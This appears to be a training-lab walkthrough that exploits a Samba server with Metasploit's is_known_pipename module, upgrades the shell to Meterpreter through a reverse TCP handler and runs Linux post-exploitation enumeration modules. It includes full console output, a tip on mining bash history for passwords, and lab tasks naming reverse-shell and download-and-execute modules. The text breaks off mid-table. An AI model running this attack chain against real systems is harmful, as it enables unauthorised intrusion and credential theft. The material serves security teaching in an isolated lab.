Linux Post Exploitation Modules
The MSF provides us with various post exploitation modules for both Windows and Linux.
We can utilize these post exploitation modules to enumerate information about the Linux system we currently have access to:
- Enumerate system configuration
- Enumerate environment variables
- Enumerate network configuration
- VM check
- Enumerate user history
Demo: Linux Post Exploitation Modules
ifconfig
eth1: 192.112.165.2
service postgresql start && msfconsole -q
workspace -a Linux_PE
setg RHOSTS 192.112.165.3
db_nmap -sV 192.112.165.3
We have SMB running on the Linux target. We’ve explored how to exploit Samba. We don’t need to change the payload. It’ll probably give us a command shell session. We can upgrade that to a meterpreter session in a few seconds.
search type:exploit samba
use exploit/linux/samba/is_known_pipename
show options
exploit
Samba is_known_pipename() Arbitrary Module Load
This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
We get a command shell session.
pwd # Print our working directory.
Put this in the background using the Ctrl+Z keyboard combination.
List out the sessions.
sessions
That is a command shell session. We want to upgrade this to a meterpreter session.
Use -u to upgrade, and specify the session id, which is 1.
sessions -u 1
sessions
We have a meterpreter session on the target.
sessions 2
Firstly, start off with some local enumeration using the meterpreter session as well as a native shell session on the target system.
meterpreter > sysinfo
Get our current user id or the current user that we have access to.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
The user id is 0, which on Linux means that we are the root user.
That’s some basic enumeration with meterpreter.
We can perform most of the local enumeration on a Linux system by typing in shell, which gives us a native terminal on the system.
meterpreter > shell
In this case, we can spawn a bash session by typing in /bin/bash -i. So we get a bash session.
/bin/bash -i
root@victim-1:/tmp#
We have root privileges. In this case, we don’t need to elevate our privileges.
whoami: identify the user that you currently have access to.
root@victim-1:/tmp# whoami
List out the other user accounts on the system.
root@victim-1:/tmp# cat /etc/passwd
In terms of user accounts, we have only the root user. The rest of them look like service accounts with no usable login shell. Service accounts such as www-data are primarily used to run services like the web server.
That’s how to enumerate the users on the Linux system.
Find out what groups your current user is a part of by typing groups and then the name of the user.
root@victim-1:/tmp# groups root
The user root is part of the root group, which makes sense because the root group is used to assign administrative privileges to members of that group.
Enumerate the distribution release version.
root@victim-1:/tmp# cat /etc/*issue
Get the kernel version,
root@victim-1:/tmp# uname -r
Get additional information, like the host name, the kernel version, the architecture.
root@victim-1:/tmp# uname -a
Perform some network enumeration.
root@victim-1:/tmp# ifconfig
root@victim-1:/tmp# ip a s
That will list out all the interfaces on the target system. This is the primary network interface here, Ethernet 0; you can read the subnet from it if you’re performing pivoting.
List out the various services that are currently listening on open ports.
root@victim-1:/tmp# netstat -antp
List all the processes on the system.
root@victim-1:/tmp# ps aux
These are all the processes on the system.
Enumerate the environment variables for this particular user by typing in env.
root@victim-1:/tmp# env
These are all the environment variables for the root user. It tells us the path that it will use to look for binaries, in this case.
That’s some local enumeration within a Linux terminal.
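As an added example (not from the original walkthrough), the script below does the account classification above programmatically: it checks each login shell in an /etc/passwd dump against /etc/shells, the same valid-login-shell list that enum_configs later stores as loot, to separate interactive accounts from service accounts. The sample data is constructed and the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: classify the accounts
# in an /etc/passwd dump by checking each login shell against /etc/shells,
# the two files the walkthrough inspects by hand and via enum_configs.

# classify_accounts MODE PASSWD_FILE SHELLS_FILE
#   MODE is "interactive" (shell listed in SHELLS_FILE) or "service" (not listed).
# Prints "user:uid:home:shell" for every matching account. An empty shell
# field means /bin/sh, as login(1) treats it.
classify_accounts() {
    mode=$1; passwd=$2; shells=$3
    awk -F: -v mode="$mode" -v shells_file="$shells" '
        BEGIN {
            # Load the valid login shells, ignoring comments and blank lines.
            while ((getline line < shells_file) > 0) {
                sub(/#.*/, "", line)
                gsub(/^[ \t]+|[ \t]+$/, "", line)
                if (line != "") valid[line] = 1
            }
            close(shells_file)
        }
        /^#/ || NF < 7 { next }          # skip comments and malformed lines
        {
            sh = ($7 == "") ? "/bin/sh" : $7
            listed = (sh in valid)
            if ((mode == "interactive" && listed) || (mode == "service" && !listed))
                print $1 ":" $3 ":" $6 ":" sh
        }
    ' "$passwd"
}

interactive_accounts() { classify_accounts interactive "$1" "$2"; }
service_accounts()     { classify_accounts service     "$1" "$2"; }

# Constructed sample input mirroring the shape of the walkthrough's output.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/sh
messagebus:x:104:107::/var/run/dbus:/bin/false
legacy:x:1001:1001:Legacy account:/home/legacy:'
SAMPLE_SHELLS='# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash'

# demo: writes the sample data to temporary files and prints both classes.
demo() {
    tmp=$(mktemp -d)
    printf '%s\n' "$SAMPLE_PASSWD" > "$tmp/passwd"
    printf '%s\n' "$SAMPLE_SHELLS" > "$tmp/shells"
    echo "interactive accounts:"; interactive_accounts "$tmp/passwd" "$tmp/shells"
    echo "service accounts:";     service_accounts     "$tmp/passwd" "$tmp/shells"
    rm -rf "$tmp"
}
demo
```

On a real host, run it as interactive_accounts /etc/passwd /etc/shells; an account with a valid shell but no real home directory is the kind of entry worth a second look.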
Let’s take a look at the various Linux post exploitation modules that we can use.
Terminate this channel.
root@victim-1:/tmp# ^C
The meterpreter session closed here for some reason. I’m going to upgrade our session once again to get another meterpreter session.
sessions -u 1
sessions
We get another meterpreter session. Now it is the session 3.
Let’s explore the various Linux post exploitation modules that we can use.
Linux Gather Configurations
This module collects configuration files found on commonly installed applications and services, such as Apache, MySQL, Samba, Sendmail, etc. If a config file is found in its default path, the module will assume that is the file we want.
This is a Linux post exploitation module, and it will gather all the Linux configuration files.
search enum_configs
use post/linux/gather/enum_configs
show options
set SESSION 3
run
If it fails to open a file, that means the configuration file probably doesn’t exist on the target. For each file it does find, it tells you the directory where that information has been saved.
If you’re utilizing the Metasploit Framework database within your workspace, you can type in loot, and that will tell you where all of this information is saved.
loot
If I wanted to identify the shells that are currently on the system, I can copy the path to the file.
cat /root/.msf4/loot/20211126230647_Linux_PE_192.112.165.3_linux.enum.conf_788071.txt
These are the shells on the system.
One of the great things about the Metasploit Framework database and workspaces is that they allow you to save your data, and all of this data will remain even after you shut down your msfconsole session.
That is how to gather or enumerate the configuration files from a Linux system.
Let’s take a look at the Environment Variable Module.
Multi Gather Generic Operating System Environment Settings
This module prints out the operating system environment variables.
It will gather the operating system environment variables.
search env platform:linux
use post/multi/gather/env
show options
set SESSION 3
run
Because we couldn’t enumerate the network information, we can utilize a module to automate that for us.
That’s used to gather network information.
Linux Gather Network Information
This module gathers network information from the target system: IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information.
search enum_network
use post/linux/gather/enum_network
show options
set SESSION 3
run
loot
Let’s try the DNS configuration.
cat /root/.msf4/loot/20211126230923_Linux_PE_192.112.165.3_linux.enum.netwo_033792.txt
The primary DNS server is members.linode.com, which means that this particular target system is being hosted on Linode. We get the cloud service provider. As opposed to AWS, we now know it’s running on Linode.
Check for the various protection systems that have been put in place on the Linux system. When I’m referring to the protection systems, I’m simply referring to the various security features or modules that may have been enabled, like SELinux, iptables, etc.
Linux Gather Protection Enumeration
This module checks whether popular system hardening mechanisms are in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also tries to find installed applications that can be used to hinder, prevent, or detect attacks, such as tripwire, snort, and apparmor. This module is meant to identify Linux Secure Modules (LSM) in addition to various antivirus, IDS/IPS, firewalls, sandboxes and other security related software.
This is very important if you are trying to identify whether the system has been hardened or whether any system hardening mechanisms are in place.
search enum_protections
use post/linux/gather/enum_protections
info
set SESSION 3
run
All of this is going to be saved to your notes.
notes
That is where all your important notes will be stored in regards to information gathered from post exploitation modules. Whenever a module tells you that the information has been stored in notes, you can access it by typing in notes. This is stored within the Metasploit Framework database.
Let’s take a look at some system enumeration. This performs or gathers system and user information.
enum_system
The enum_system module gathers system information. It collects installed packages, installed services, mount information, user list, user bash history and cron jobs.
search enum_system
use post/linux/gather/enum_system
show options
info
set SESSION 3
run
Take a look at the installed packages.
loot
cat /root/.msf4/loot/2021112631320_Linux_PE_192.112.165.3_linux.enum.syste_461525.txt
Take a look at the disk information here.
cat /root/.msf4/loot/2021112631320_Linux_PE_192.112.165.3_linux.enum.syste_797064.txt
That is how to enumerate or perform system enumeration.
We can also check whether we are currently inside a VM or a container. In many cases, a Linux target may be a container, such as a Docker container, or a virtual machine.
First and foremost, we can start off by checking whether this is a container.
If we are in a container, then we could possibly utilize that information to perform a container breakout, which is an advanced exploitation technique, but it is viable.
Linux Gather Container Detection
This module attempts to determine whether the system is running inside of a container and if so, which one. This module supports detection of Docker, LXC, and systemd nspawn.
search checkcontainer
use post/linux/gather/checkcontainer
show options
set SESSION 3
run
This appears to be a ‘Docker’ container. That’s very important, because there are many privilege escalation and container breakout exploits or techniques that you can utilize to break out of the container and gain access to the host system that is hosting the Docker containers. That can be very useful if you are staging further attacks on the system.
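Added example, not the checkcontainer module’s own code: a hand-written, simplified version of the heuristics a container check typically relies on (Docker’s /.dockerenv marker, the runtime named in PID 1’s cgroup path, and the container= variable in PID 1’s environment), so the “Docker container” result above can be understood and verified from a plain shell. The function name, the optional root prefix and the sample trees are assumptions of this example.

```shell
#!/bin/sh
# Added example, not the Metasploit checkcontainer module's code: a simplified
# reimplementation of common container-detection heuristics. ROOT defaults to
# "/" and lets the same function run against a constructed directory tree.

# container_kind [ROOT]
# Prints docker, lxc, systemd-nspawn, another value taken from PID 1's
# container= variable, or none. Exit status 0 when a container is detected.
container_kind() {
    root="${1:-/}"; root="${root%/}"
    cgroup="$root/proc/1/cgroup"
    environ="$root/proc/1/environ"

    # Docker drops this marker file in the container's root filesystem.
    if [ -f "$root/.dockerenv" ]; then
        echo docker; return 0
    fi
    # On cgroup v1 hosts PID 1's cgroup path names the runtime. On cgroup v2 it
    # is usually just "0::/", which is why the marker file is checked first.
    if [ -r "$cgroup" ]; then
        if grep -qE '/(docker|containerd)' "$cgroup"; then echo docker; return 0; fi
        if grep -qE '/lxc(/|\.|$)' "$cgroup"; then echo lxc; return 0; fi
    fi
    # systemd-nspawn and LXC export container=<type> in PID 1's environment
    # (readable only as root on a live host, hence the -r guard).
    if [ -r "$environ" ]; then
        ctype=$(tr '\0' '\n' < "$environ" | sed -n 's/^container=//p' | head -n 1)
        case "$ctype" in
            "") ;;
            lxc|lxc-libvirt) echo lxc; return 0 ;;
            *) echo "$ctype"; return 0 ;;
        esac
    fi
    echo none; return 1
}

# demo: constructed trees exercising each branch, then the live host.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/docker" "$tmp/lxc/proc/1" "$tmp/nspawn/proc/1" "$tmp/bare"
    : > "$tmp/docker/.dockerenv"
    printf '12:pids:/lxc/web01\n' > "$tmp/lxc/proc/1/cgroup"
    printf 'container=systemd-nspawn\0PATH=/usr/bin\0' > "$tmp/nspawn/proc/1/environ"
    for t in docker lxc nspawn bare; do
        printf '%s -> %s\n' "$t" "$(container_kind "$tmp/$t" || true)"
    done
    printf 'this host -> %s\n' "$(container_kind / || true)"
    rm -rf "$tmp"
}
demo
```

Because every branch is a heuristic, a hardened image can defeat any one of them; a result of none therefore means “no evidence found”, not “not a container”.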
checkvm
The checkvm module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.
search checkvm
use post/linux/gather/checkvm
show options
set SESSION 3
run
Let’s take a look at how to enumerate the user’s history.
This will gather the user history for all the user accounts on the system.
enum_users_history
The enum_users_history module gathers user-specific information: user list, bash history, mysql history, vim history, lastlog and sudoers.
search enum_users_history
use post/linux/gather/enum_users_history
show options
set SESSION 3
run
In this case, it’s going to try and get the bash history file or the history file for all these service accounts as well as the root account.
First of all, it gets the history file for the root account. The history file on Linux stores a log of the commands that have been typed in by the user.
loot
The bash history for root:
cat /root/.msf4/loot/20211126231657_Linux_PE_192.112.165.3_linux.enum.users_749147.txt
We can see what commands the root user typed in. These are all the commands that we typed in.
If the root user had typed in any commands previously, then we would see them here. Sometimes, users may paste in or type in passwords. And you can check the history file to identify those passwords in clear text. The history file just gives you a rundown of all the commands that have been typed in sequentially.
That’s how to enumerate the user account history. And in regards to the various post exploitation modules available for Linux, that’s pretty much it.
Post Exploitation Lab I
Overview
In this lab, the target machine is running a vulnerable file sharing service. Exploit it and run the following post modules on the target:
- post/linux/gather/enum_configs
- post/multi/gather/env
- post/linux/gather/enum_network
- post/linux/gather/enum_protections
- post/linux/gather/enum_system
- post/linux/gather/checkcontainer
- post/linux/gather/checkvm
- post/linux/gather/enum_users_history
- post/multi/manage/system_session
- post/linux/manage/download_exec
Instructions:
- This lab is dedicated to you! No other users are on this network
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-194.pdf
Multi Manage System Remote TCP Shell Session
post/multi/manage/system_session
This module will create a Reverse TCP Shell on the target system using the system’s own scripting environments installed on the target.
Linux Manage Download and Execute
post/linux/manage/download_exec
This module downloads and runs a file with bash. It first tries to use curl as its HTTP client and then wget if curl is not found. The bash found in the PATH is used to execute the file.
Reproducing the video content
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.111.31.2 netmask 255.255.255.0 broadcast 192.111.31.255
ether 02:42:c0:6f:1f:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.111.31.3
root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > workspace -a Linux_PE
[*] Added workspace: Linux_PE
[*] Workspace: Linux_PE
msf5 > setg RHOSTS 192.111.31.3
RHOSTS => 192.111.31.3
msf5 > db_nmap -sV 192.111.31.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-10 14:37 UTC
[*] Nmap: Nmap scan report for target-1 (192.111.31.3)
[*] Nmap: Host is up (0.0000090s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:6F:1F:03 (Unknown)
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.111.31.3 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.111.31.3 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf5 > search type:exploit samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
3 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.111.31.3 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
msf5 exploit(linux/samba/is_known_pipename) > exploit
[*] 192.111.31.3:445 - Using location \\192.111.31.3\exploitable\tmp for the path
[*] 192.111.31.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.111.31.3:445 - Share 'exploitable' has server-side path '/
[*] 192.111.31.3:445 - Uploaded payload to \\192.111.31.3\exploitable\tmp\lWygoEQH.so
[*] 192.111.31.3:445 - Loading the payload from server-side path /tmp/lWygoEQH.so using \\PIPE\/tmp/lWygoEQH.so...
[-] 192.111.31.3:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.111.31.3:445 - Loading the payload from server-side path /tmp/lWygoEQH.so using /tmp/lWygoEQH.so...
[+] 192.111.31.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.111.31.2:42931 -> 192.111.31.3:445) at 2023-03-10 14:41:46 +0000
pwd
/tmp
^Z
Background session 1? [y/N] y
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
msf5 exploit(linux/samba/is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.111.31.2:4433
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 2 opened (192.111.31.2:4433 -> 192.111.31.3:48926) at 2023-03-10 14:54:12 +0000
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 3 opened (192.111.31.2:4433 -> 192.111.31.3:51520) at 2023-03-10 14:54:16 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
2 meterpreter x86/linux 192.111.31.2:4433 -> 192.111.31.3:48926 (192.111.31.3)
3 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.111.31.3 192.111.31.2:4433 -> 192.111.31.3:51520 (192.111.31.3)
msf5 exploit(linux/samba/is_known_pipename) > sessions 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer : 192.111.31.3
OS : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > shell
Process 69 created.
Channel 1 created.
/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# whoami
whoami
root
root@victim-1:/tmp# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
colord:x:105:112:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:106:113::/var/lib/saned:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
root@victim-1:/tmp# groups root
groups root
root : root
root@victim-1:/tmp# cat /etc/*issue
cat /etc/*issue
Debian GNU/Linux 8 \n \l
root@victim-1:/tmp# uname -r
uname -r
5.4.0-125-generic
root@victim-1:/tmp# uname -a
uname -a
Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
root@victim-1:/tmp# ifconfig
ifconfig
bash: ifconfig: command not found
root@victim-1:/tmp# ip a s
ip a s
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
100896: eth0@if100897: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:6f:1f:03 brd ff:ff:ff:ff:ff:ff
inet 192.111.31.3/24 brd 192.111.31.255 scope global eth0
valid_lft forever preferred_lft forever
root@victim-1:/tmp# netstat -antp
netstat -antp
bash: netstat: command not found
root@victim-1:/tmp# ps aux
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 20044 2884 ? Ss 14:33 0:00 /bin/bash /root/start.sh
root 8 0.0 0.0 292840 14816 ? Ss 14:33 0:00 /usr/local/samba/sbin/smbd -D
root 9 0.0 0.0 47076 15560 ? S 14:33 0:00 /usr/bin/python /usr/bin/supervisord -n
root 10 0.0 0.0 292840 6684 ? S 14:33 0:00 /usr/local/samba/sbin/smbd -D
root 38 0.0 0.0 2128 1844 ? Sl 14:46 0:00 /tmp/CbMfD
root 53 0.0 0.0 4336 1564 ? S 14:52 0:00 /bin/sh
root 62 0.0 0.0 1148 1024 ? S 14:54 0:00 /tmp/rnqNo
root 69 0.0 0.0 4336 760 ? S 14:57 0:00 /bin/sh
root 71 0.0 0.0 20224 3288 ? S 14:58 0:00 /bin/bash -i
root 90 0.0 0.0 17504 2084 ? R 15:04 0:00 ps aux
root@victim-1:/tmp# env
env
USER=root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
PWD=/tmp
LANG=C
SHLVL=1
HOME=/root
_=/usr/bin/env
root@victim-1:/tmp# ^C
Terminate channel 1? [y/N] y
meterpreter >
[*] 192.111.31.3 - Meterpreter session 3 closed. Reason: Died
msf5 post(linux/gather/enum_configs) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
msf5 post(linux/gather/enum_configs) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.111.31.2:4433
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 7 opened (192.111.31.2:4433 -> 192.111.31.3:60720) at 2023-03-10 15:15:46 +0000
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 8 opened (192.111.31.2:4433 -> 192.111.31.3:60722) at 2023-03-10 15:15:49 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 post(linux/gather/enum_configs) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
7 meterpreter x86/linux 192.111.31.2:4433 -> 192.111.31.3:60720 (192.111.31.3)
8 meterpreter x86/linux 192.111.31.2:4433 -> 192.111.31.3:60722 (192.111.31.3)
msf5 exploit(linux/samba/is_known_pipename) > search enum_configs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_configs normal No Linux Gather Configurations
msf5 exploit(linux/samba/is_known_pipename) > use post/linux/gather/enum_configs
msf5 post(linux/gather/enum_configs) > show options
Module options (post/linux/gather/enum_configs):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_configs) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_configs) > run
[*] Running module against 192.111.31.3 [victim-1]
[*] Info:
[*] Debian GNU/Linux 8
[*] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[-] Failed to open file: /etc/apache2/apache2.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/apache2/ports.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/nginx/nginx.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snort/snort.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mysql/my.cnf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ufw/ufw.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ufw/sysctl.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/security.access.conf: core_channel_open: Operation failed: 1
[+] shells stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.txt
[+] sepermit.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_528778.txt
[+] ca-certificates.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_551658.txt
[+] access.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_794033.txt
[-] Failed to open file: /etc/gated.conf: core_channel_open: Operation failed: 1
[+] rpc stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_566992.txt
[-] Failed to open file: /etc/psad/psad.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mysql/debian.cnf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/chkrootkit.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/logrotate.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/rkhunter.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/samba/smb.conf: core_channel_open: Operation failed: 1
[+] ldap.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_240863.txt
[-] Failed to open file: /etc/openldap/openldap.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/cups.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: Operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_361315.txt
[-] Failed to open file: /etc/proxychains.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/snmp.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mail/sendmail.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snmp/snmp.conf: core_channel_open: Operation failed: 1
[*] Post module execution completed
msf5 post(linux/gather/enum_configs) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.conf shells text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.txt
192.111.31.3 linux.enum.conf sepermit.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_528778.txt
192.111.31.3 linux.enum.conf ca-certificates.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_551658.txt
192.111.31.3 linux.enum.conf access.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_794033.txt
192.111.31.3 linux.enum.conf rpc text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_566992.txt
192.111.31.3 linux.enum.conf ldap.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_240863.txt
192.111.31.3 linux.enum.conf sysctl.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_361315.txt
msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.txt
[*] exec: cat /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.txt
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
msf5 post(linux/gather/enum_configs) > search env platform:linux
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
23 post/multi/gather/env normal No Multi Gather Generic Operating System Environment Settings
msf5 post(linux/gather/enum_configs) > use post/multi/gather/env
msf5 post(multi/gather/env) > show options
Module options (post/multi/gather/env):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(multi/gather/env) > sessions
Active sessions
===============
Id Name Type Information Connection
